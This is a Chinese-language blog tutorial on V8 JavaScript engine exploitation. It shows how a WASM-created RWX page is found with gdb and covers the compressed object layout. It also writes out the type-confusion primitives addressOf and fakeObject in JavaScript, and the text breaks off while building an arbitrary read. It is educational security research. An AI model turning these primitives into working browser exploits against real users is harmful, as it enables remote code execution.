<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Loora1N">



    <meta name="description" content="Blog of Loora1N">





<title>【V8】通用利用链研究 | Loora1N&#39;s Blog | 鹭雨</title>



    <link rel="icon" href="/favicon.ico">



<style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Noto+Sans+SC:wght@300;400;500;700&family=Roboto+Mono&display=swap');
</style>



    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    




    <!-- scripts list from _config.yml -->
    
    <script src="/js/menu.js"></script>
    
    <script src="/js/highlight.min.js"></script>
    
    <script src="/js/highlightjs-line-numbers.js"></script>
    
    <script src="/js/format.js"></script>
    
    <script src="/js/search.js"></script>
    




    <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
    <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>




    <script src='https://unpkg.com/valine@1.4.16/dist/Valine.min.js'></script>




  <meta name="generator" content="Hexo 6.2.0"></head>
  <body>
    <div class="mask-border">
    </div>

    <div class="wrapper">

      <div class="header">
  <div class="flex-container">
    <div class="header-inner">
      <div class="site-brand-container">
        <a href="/">
          
            Loora1N&#39;s Blog | 鹭雨
          
        </a>
      </div>
      <div id="menu-btn" class="menu-btn" onclick="toggleMenu()">
        Menu
      </div>
      <nav class="site-nav">
        <ul class="menu-list">
          
            
              <li class="menu-item">
                <a href="/">首页</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/archives/">索引</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/about/">述己</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/links/">友链</a>
              </li> 
                   
          
          
            <li class="menu-item search-btn">
              <a href="#">Search</a>
            </li>
          
        </ul>
      </nav>
    </div>
  </div>
</div>


      <div class="main">
        <div class="flex-container">
          <article id="post">

  
    <div class="post-head">
    <div class="post-info">
        <div class="tag-list">
            
        </div>
        <div class="post-title">
            
            
                【V8】通用利用链研究
            
            
        </div>
        <span class="post-date">
            7月 25, 2024
        </span>
    </div>
    <div class="post-img">
        
            <div class="h-line-primary"></div>
              
    </div>
</div>
    <div class="post-content">
    <h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><p>在v8利用上，我觉得也有一个明确的目标，就是执行任意<code>shellcode</code>。当有了这个目标后，下一步就是思考，怎么写<code>shellcode</code>呢？那么就需要有写内存相关的洞，能写到可读可写可执行的内存段，最好是能任意地址写。配套的还需要有任意读，因为需要知道rwx内存段的地址。就算没有任意读，也需要有办法能把改地址泄漏出来（V8的binary保护基本是全开的）。接下来就是需要能控制RIP，能让RIP跳转到<code>shellcode</code>的内存段</p>
<h2 id="WASM"><a href="#WASM" class="headerlink" title="WASM"></a>WASM</h2><p>现如今的浏览器基本都支持WASM，v8会专门生成一段rwx内存供WASM使用，这就给了我们利用的机会。测试代码如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">%<span class="title class_">SystemBreak</span>();</span><br><span class="line"><span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">133</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">127</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,<span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">109</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">138</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">65</span>,<span class="number">42</span>,<span class="number">11</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> wasmModule = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode);</span><br><span class="line"><span class="keyword">var</span> wasmInstance = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(wasmModule, &#123;&#125;);</span><br><span class="line"><span class="keyword">var</span> f = wasmInstance.<span class="property">exports</span>.<span class="property">main</span>;</span><br><span class="line">%<span class="title class_">DebugPrint</span>(f);</span><br><span class="line">%<span class="title class_">DebugPrint</span>(wasmInstance);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure>

<p>然后使用gdb进行调试，在第一个断点的时候，使用<code>vmmap</code>来查看一下内存段，这个时候内存中是不存在可读可写可执行的内存断的，我们让程序继续运行。</p>
<p>在第二个断点的时候，我们再运行一次<code>vmmap</code>来查看内存段：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; vmmap</span><br><span class="line">0x1b4249fd1000     0x1b4249fd2000 rwxp     1000      0 [anon_1b4249fd1]</span><br></pre></td></tr></table></figure>

<p>因为WASM代码的创建，内存中出现可rwx的内存段。接下来的问题就是，我们怎么获取到这个地址呢？首先我们来看看变量<code>f</code>的信息：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">DebugPrint: 0x19a4081d370d: [Function] <span class="keyword">in</span> OldSpace</span><br><span class="line"> - map: 0x19a408204919 &lt;Map(HOLEY_ELEMENTS)&gt; [FastProperties]</span><br><span class="line"> - prototype: 0x19a4081c3b4d &lt;JSFunction (sfi = 0x19a408144165)&gt;</span><br><span class="line"> - elements: 0x19a40800222d &lt;FixedArray[0]&gt; [HOLEY_ELEMENTS]</span><br><span class="line"> - <span class="keyword">function</span> prototype: &lt;no-prototype-slot&gt;</span><br><span class="line"> - shared_info: 0x19a4081d36e9 &lt;SharedFunctionInfo js-to-wasm::i&gt;</span><br><span class="line"> - name: 0x19a4080051cd &lt;String[1]: <span class="comment">#0&gt;</span></span><br><span class="line"> - <span class="built_in">builtin</span>: GenericJSToWasmWrapper</span><br><span class="line"> - formal_parameter_count: 0</span><br><span class="line"> - kind: NormalFunction</span><br><span class="line"> - context: 0x19a4081c3649 &lt;NativeContext[252]&gt;</span><br><span class="line"> - code: 0x19a40018d801 &lt;Code BUILTIN GenericJSToWasmWrapper&gt;</span><br><span class="line"> - Wasm instance: 0x19a4081d35b9 &lt;Instance map = 0x19a408207399&gt;</span><br><span class="line"> - Wasm <span class="keyword">function</span> index: 0</span><br><span class="line"> - properties: 0x19a40800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - All own properties (excluding elements): &#123;</span><br><span class="line">    0x19a4080048f1: [String] <span class="keyword">in</span> ReadOnlySpace: <span class="comment">#length: 0x19a408142339 &lt;AccessorInfo&gt; (const accessor descriptor), location: descriptor</span></span><br><span class="line">    0x19a408004a21: [String] <span class="keyword">in</span> ReadOnlySpace: <span class="comment">#name: 0x19a4081422f5 &lt;AccessorInfo&gt; (const accessor descriptor), location: descriptor</span></span><br><span class="line">    0x19a408004029: [String] <span class="keyword">in</span> ReadOnlySpace: <span class="comment">#arguments: 0x19a40814226d &lt;AccessorInfo&gt; (const accessor descriptor), location: descriptor</span></span><br><span class="line">    0x19a408004245: [String] <span class="keyword">in</span> ReadOnlySpace: <span class="comment">#caller: 0x19a4081422b1 &lt;AccessorInfo&gt; (const accessor descriptor), location: descriptor</span></span><br><span class="line"> &#125;</span><br><span class="line"> - feedback vector: feedback metadata is not available <span class="keyword">in</span> SFI</span><br><span class="line">0x19a408204919: [Map]</span><br><span class="line"> - <span class="built_in">type</span>: JS_FUNCTION_TYPE</span><br><span class="line"> - instance size: 28</span><br><span class="line"> - inobject properties: 0</span><br><span class="line"> - elements kind: HOLEY_ELEMENTS</span><br><span class="line"> - unused property fields: 0</span><br><span class="line"> - enum length: invalid</span><br><span class="line"> - stable_map</span><br><span class="line"> - callable</span><br><span class="line"> - back pointer: 0x19a4080023b5 &lt;undefined&gt;</span><br><span class="line"> - prototype_validity cell: 0x19a408142405 &lt;Cell value= 1&gt;</span><br><span class="line"> - instance descriptors (own) <span class="comment">#4: 0x19a4081d0445 &lt;DescriptorArray[4]&gt;</span></span><br><span class="line"> - prototype: 0x19a4081c3b4d &lt;JSFunction (sfi = 0x19a408144165)&gt;</span><br><span class="line"> - constructor: 0x19a408002235 &lt;null&gt;</span><br><span class="line"> - dependent code: 0x19a4080021b9 &lt;Other heap object (WEAK_FIXED_ARRAY_TYPE)&gt;</span><br><span class="line"> - construction counter: 0</span><br></pre></td></tr></table></figure>

<p>可以发现这是一个函数对象，我们来查看一下<code>f</code>的<code>shared_info</code>结构的信息：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; job 0x19a4081d36e9</span><br><span class="line">0x19a4081d36e9: [SharedFunctionInfo] <span class="keyword">in</span> OldSpace</span><br><span class="line"> - map: 0x19a4080025f9 &lt;Map[36]&gt;</span><br><span class="line"> - name: 0x19a4080051cd &lt;String[1]: <span class="comment">#0&gt;</span></span><br><span class="line"> - kind: NormalFunction</span><br><span class="line"> - syntax kind: AnonymousExpression</span><br><span class="line"> - function_map_index: 179</span><br><span class="line"> - formal_parameter_count: 0</span><br><span class="line"> - expected_nof_properties: </span><br><span class="line"> - language_mode: sloppy</span><br><span class="line"> - data: 0x19a4081d36bd &lt;Other heap object (WASM_EXPORTED_FUNCTION_DATA_TYPE)&gt;</span><br><span class="line"> - code (from data): 0x19a40018d801 &lt;Code BUILTIN GenericJSToWasmWrapper&gt;</span><br><span class="line"> - script: 0x19a4081d3541 &lt;Script&gt;</span><br><span class="line"> - <span class="keyword">function</span> token position: 88</span><br><span class="line"> - start position: 88</span><br><span class="line"> - end position: 92</span><br><span class="line"> - no debug info</span><br><span class="line"> - scope info: 0x19a408002739 &lt;ScopeInfo&gt;</span><br><span class="line"> - length: 0</span><br><span class="line"> - feedback_metadata: &lt;none&gt;</span><br></pre></td></tr></table></figure>

<p>接下里再查看其<code>data</code>结构：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; job 0x19a4081d36bd</span><br><span class="line">0x19a4081d36bd: [WasmExportedFunctionData] <span class="keyword">in</span> OldSpace</span><br><span class="line"> - map: 0x19a408002e7d &lt;Map[44]&gt;</span><br><span class="line"> - target: 0x1b4249fd1000</span><br><span class="line"> - ref: 0x19a4081d35b9 &lt;Instance map = 0x19a408207399&gt;</span><br><span class="line"> - wrapper_code: 0x19a40018d801 &lt;Code BUILTIN GenericJSToWasmWrapper&gt;</span><br><span class="line"> - instance: 0x19a4081d35b9 &lt;Instance map = 0x19a408207399&gt;</span><br><span class="line"> - function_index: 0</span><br><span class="line"> - signature: 0x19a408049e81 &lt;Foreign&gt;</span><br><span class="line"> - wrapper_budget: 1000</span><br></pre></td></tr></table></figure>

<p>再查看<code>instance</code>结构：</p>
 <figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; job 0x19a4081d35b9</span><br><span class="line">0x19a4081d35b9: [WasmInstanceObject] <span class="keyword">in</span> OldSpace</span><br><span class="line"> - map: 0x19a408207399 &lt;Map(HOLEY_ELEMENTS)&gt; [FastProperties]</span><br><span class="line"> - prototype: 0x19a408048069 &lt;Object map = 0x19a408207af1&gt;</span><br><span class="line"> - elements: 0x19a40800222d &lt;FixedArray[0]&gt; [HOLEY_ELEMENTS]</span><br><span class="line"> - module_object: 0x19a408049c95 &lt;Module map = 0x19a408207231&gt;</span><br><span class="line"> - exports_object: 0x19a408049e49 &lt;Object map = 0x19a408207bb9&gt;</span><br><span class="line"> - native_context: 0x19a4081c3649 &lt;NativeContext[252]&gt;</span><br><span class="line"> - memory_object: 0x19a4081d35a1 &lt;Memory map = 0x19a408207641&gt;</span><br><span class="line"> - table 0: 0x19a408049e19 &lt;Table map = 0x19a4082074b1&gt;</span><br><span class="line"> - imported_function_refs: 0x19a40800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - indirect_function_table_refs: 0x19a40800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - managed_native_allocations: 0x19a408049dd1 &lt;Foreign&gt;</span><br><span class="line"> - memory_start: 0x7f70c0000000</span><br><span class="line"> - memory_size: 65536</span><br><span class="line"> - imported_function_targets: 0x55b2e0e37d40</span><br><span class="line"> - globals_start: (nil)</span><br><span class="line"> - imported_mutable_globals: 0x55b2e0e37dc0</span><br><span class="line"> - indirect_function_table_size: 0</span><br><span class="line"> - indirect_function_table_sig_ids: (nil)</span><br><span class="line"> - indirect_function_table_targets: (nil)</span><br><span class="line"> - properties: 0x19a40800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - All own properties (excluding elements): &#123;&#125;</span><br></pre></td></tr></table></figure>

<p>仔细查看能发现，<code>instance</code>结构就是js代码中的<code>wasmInstance</code>变量的地址，在代码中我们加入了<code>%DebugPrint(wasmInstance);</code>，所以也会输出该结构的信息，可以去对照看看。</p>
<p>我们再来查看这个结构的内存布局：</p>
<p><img src="/img/article/v8-2/image-20240724144804011.png" alt="image-20240724144804011"></p>
<p>仔细看，能发现，rwx段的起始地址储存在<code>instance+0x60</code>的位置，不过这个不用记，不同版本，这个偏移值可能会有差距，可以在写exp的时候通过上述调试的方式进行查找。</p>
<p>根据WASM的特性，我们的目的可以更细化了，现在我们的目的变为了把<code>shellcode</code>写到WASM的代码段，然后执行WASM函数，那么就能执行<code>shellcode</code>了。</p>
<h2 id="数据存储结构"><a href="#数据存储结构" class="headerlink" title="数据存储结构"></a>数据存储结构</h2><p>首先来看看JavaScript的两种类型的变量的结构：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">a = [<span class="number">2.1</span>];</span><br><span class="line">b = &#123;<span class="string">&quot;a&quot;</span>: <span class="number">1</span>&#125;;</span><br><span class="line">c = [b];</span><br><span class="line">%<span class="title class_">DebugPrint</span>(a);</span><br><span class="line">%<span class="title class_">DebugPrint</span>(b);</span><br><span class="line">%<span class="title class_">DebugPrint</span>(c);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure>

<p>对照变量a的job结果和内存内容如图，我们可以推断出a的数据存储结构</p>
<p><img src="/img/article/v8-2/image-20240724150943906.png" alt="image-20240724150943906"></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">| 32 bit map addr | 32 bit properties addr | 32 bit elements addr | 32 bit length|</span><br></pre></td></tr></table></figure>

<p>可以注意到只存储了低32位的地址，这是因为在当前版本的v8中，对地址进行了压缩，因为高32bit地址的值是一样的。</p>
<p>同理分析<code>elements</code>的结构，可以得到大致</p>
<p><img src="/img/article/v8-2/image-20240724151241342.png" alt="image-20240724151241342"></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">| 32 bit map addr | 32 bit length | value ......</span><br></pre></td></tr></table></figure>

<p>接下来看看变量b和c</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">DebugPrint: 0x1f8608049991: [JS_OBJECT_TYPE]</span><br><span class="line"> - map: 0x1f8608207aa1 &lt;Map(HOLEY_ELEMENTS)&gt; [FastProperties]</span><br><span class="line"> - prototype: 0x1f86081c41f5 &lt;Object map = 0x1f86082021b9&gt;</span><br><span class="line"> - elements: 0x1f860800222d &lt;FixedArray[0]&gt; [HOLEY_ELEMENTS]</span><br><span class="line"> - properties: 0x1f860800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - All own properties (excluding elements): &#123;</span><br><span class="line">    0x1f8608007b15: [String] <span class="keyword">in</span> ReadOnlySpace: <span class="comment">#a: 1 (const data field 0), location: in-object</span></span><br><span class="line"> &#125;</span><br><span class="line">0x1f8608207aa1: [Map]</span><br><span class="line"> - <span class="built_in">type</span>: JS_OBJECT_TYPE</span><br><span class="line"> - instance size: 16</span><br><span class="line"> - inobject properties: 1</span><br><span class="line"> - elements kind: HOLEY_ELEMENTS</span><br><span class="line"> - unused property fields: 0</span><br><span class="line"> - enum length: invalid</span><br><span class="line"> - stable_map</span><br><span class="line"> - back pointer: 0x1f8608207a79 &lt;Map(HOLEY_ELEMENTS)&gt;</span><br><span class="line"> - prototype_validity cell: 0x1f8608142405 &lt;Cell value= 1&gt;</span><br><span class="line"> - instance descriptors (own) <span class="comment">#1: 0x1f86080499a1 &lt;DescriptorArray[1]&gt;</span></span><br><span class="line"> - prototype: 0x1f86081c41f5 &lt;Object map = 0x1f86082021b9&gt;</span><br><span class="line"> - constructor: 0x1f86081c3e2d &lt;JSFunction Object (sfi = 0x1f860814474d)&gt;</span><br><span class="line"> - dependent code: 0x1f86080021b9 &lt;Other heap object (WEAK_FIXED_ARRAY_TYPE)&gt;</span><br><span class="line"> - construction counter: 0</span><br><span class="line"></span><br><span class="line">DebugPrint: 0x1f86080499c9: [JSArray]</span><br><span class="line"> - map: 0x1f8608203b31 &lt;Map(PACKED_ELEMENTS)&gt; [FastProperties]</span><br><span class="line"> - prototype: 0x1f86081cc0e9 &lt;JSArray[0]&gt;</span><br><span class="line"> - elements: 0x1f86080499bd &lt;FixedArray[1]&gt; [PACKED_ELEMENTS]</span><br><span class="line"> - length: 1</span><br><span class="line"> - properties: 0x1f860800222d &lt;FixedArray[0]&gt;</span><br><span class="line"> - All own properties (excluding elements): &#123;</span><br><span class="line">    0x1f86080048f1: [String] <span class="keyword">in</span> ReadOnlySpace: <span class="comment">#length: 0x1f860814215d &lt;AccessorInfo&gt; (const accessor descriptor), location: descriptor</span></span><br><span class="line"> &#125;</span><br><span class="line"> - elements: 0x1f86080499bd &lt;FixedArray[1]&gt; &#123;</span><br><span class="line">           0: 0x1f8608049991 &lt;Object map = 0x1f8608207aa1&gt;</span><br><span class="line"> &#125;</span><br><span class="line">0x1f8608203b31: [Map]</span><br><span class="line"> - <span class="built_in">type</span>: JS_ARRAY_TYPE</span><br><span class="line"> - instance size: 16</span><br><span class="line"> - inobject properties: 0</span><br><span class="line"> - elements kind: PACKED_ELEMENTS</span><br><span class="line"> - unused property fields: 0</span><br><span class="line"> - enum length: invalid</span><br><span class="line"> - back pointer: 0x1f8608203b09 &lt;Map(HOLEY_DOUBLE_ELEMENTS)&gt;</span><br><span class="line"> - prototype_validity cell: 0x1f8608142405 &lt;Cell value= 1&gt;</span><br><span class="line"> - instance descriptors <span class="comment">#1: 0x1f86081cc59d &lt;DescriptorArray[1]&gt;</span></span><br><span class="line"> - transitions <span class="comment">#1: 0x1f86081cc619 &lt;TransitionArray[4]&gt;Transition array #1:</span></span><br><span class="line">     0x1f860800524d &lt;Symbol: (elements_transition_symbol)&gt;: (transition to HOLEY_ELEMENTS) -&gt; 0x1f8608203b59 &lt;Map(HOLEY_ELEMENTS)&gt;</span><br><span class="line"></span><br><span class="line"> - prototype: 0x1f86081cc0e9 &lt;JSArray[0]&gt;</span><br><span class="line"> - constructor: 0x1f86081cbe85 &lt;JSFunction Array (sfi = 0x1f860814adc9)&gt;</span><br><span class="line"> - dependent code: 0x1f86080021b9 &lt;Other heap object (WEAK_FIXED_ARRAY_TYPE)&gt;</span><br><span class="line"> - construction counter: 0</span><br></pre></td></tr></table></figure>

<p>注意到 map 结构体中存在一项成员用以标注 elements 类型：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">- elements kind: PACKED_ELEMENTS</span><br></pre></td></tr></table></figure>

<p>因此可以直接将一个变量的 map 地址赋给另外一个变量，使得在读取值时错误解析数据类型，也就是所谓的“类型混淆”。类型混淆是有可能造成地址泄露的，可以考虑这样的代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">float_arr= [2.1];</span><br><span class="line">obj_arr=[float_arr];</span><br><span class="line">%DebugPrint(a);</span><br><span class="line">%DebugPrint(b);</span><br><span class="line">%SystemBreak();</span><br></pre></td></tr></table></figure>

<p>正常访问<code>obj_arr[0]</code>会得到一个对象，但如果修改<code>obj_arr</code>的<code>map</code>为<code>float_arr</code>的<code>map</code>，就会认为<code>obj_arr</code>是一个浮点数数组，那么此时访问<code>obj_arr[0]</code>就会得到对象<code>float_arr</code>的地址了</p>
<h2 id="数据读取"><a href="#数据读取" class="headerlink" title="数据读取"></a>数据读取</h2><h3 id="addressOf"><a href="#addressOf" class="headerlink" title="addressOf"></a>addressOf</h3><p>同上所述，我们将这种类型混淆的读取地址方法称之为<strong>addressOf</strong>，一般写法如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//获取某个变量的地址</span></span><br><span class="line"><span class="keyword">var</span> other=&#123;<span class="string">&quot;a&quot;</span>:<span class="number">1</span>&#125;;</span><br><span class="line"><span class="keyword">var</span> obj_array=[other];</span><br><span class="line"><span class="keyword">var</span> double_array=[<span class="number">2.1</span>];</span><br><span class="line"><span class="keyword">var</span> double_array_map=double_array.<span class="title function_">getMap</span>();<span class="comment">//假设我们有办法获取到其 map 值</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">addressOf</span>(<span class="params">target_var</span>)</span><br><span class="line">&#123;</span><br><span class="line">	obj_array[<span class="number">0</span>]=target_var;</span><br><span class="line">	obj_array.<span class="title function_">setMap</span>(double_array_map);<span class="comment">//设置其 map 为浮点数数组的 map</span></span><br><span class="line">	<span class="keyword">let</span> target_var_addr=<span class="title function_">float_to_int</span>(obj_array[<span class="number">0</span>]);<span class="comment">//读取obj_array[0]并将该浮点数转换为整型</span></span><br><span class="line">	<span class="keyword">return</span> target_var_addr;<span class="comment">//此处返回的是 target_var 的对象结构体地址</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="fakeObject"><a href="#fakeObject" class="headerlink" title="fakeObject"></a>fakeObject</h3><p>与 <code>addressOf</code> 的步骤相反，将 <code>float_arr</code> 的 <code>map</code> 改为 <code>obj_arr 的 map</code>，使得在访问 <code>float_arr[0]</code> 时得到一个以 <code>float_arr[0]</code> 地址为起始的对象</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//将某个地址转换为对象</span></span><br><span class="line"><span class="keyword">var</span> other=&#123;<span class="string">&quot;a&quot;</span>:<span class="number">1</span>&#125;;</span><br><span class="line"><span class="keyword">var</span> obj_array=[other];</span><br><span class="line"><span class="keyword">var</span> double_array=[<span class="number">2.1</span>];</span><br><span class="line"><span class="keyword">var</span> obj_array_map=obj_array.<span class="title function_">getMap</span>();<span class="comment">//假设我们有办法获取到其 map 值</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">fakeObject</span>(<span class="params">target_addr</span>)</span><br><span class="line">&#123;</span><br><span class="line">	double_array[<span class="number">0</span>]=<span class="title function_">int_to_float</span>(target_addr+<span class="number">1n</span>);<span class="comment">//将地址加一以区分对象和数值</span></span><br><span class="line">	double_array.<span class="title function_">setMap</span>(obj_array_map);</span><br><span class="line">	<span class="keyword">let</span> fake_obj=double_array[<span class="number">0</span>];</span><br><span class="line">	<span class="keyword">return</span> fake_obj;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="任意地址读"><a href="#任意地址读" class="headerlink" title="任意地址读"></a>任意地址读</h3><p>可以尝试构造出这样一个结构：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> fake_array=[double_array_map,<span class="title function_">int_to_float</span>(<span class="number">0x4141414141414141n</span>)];</span><br></pre></td></tr></table></figure>

<p>其在内存中的布局应为：</p>
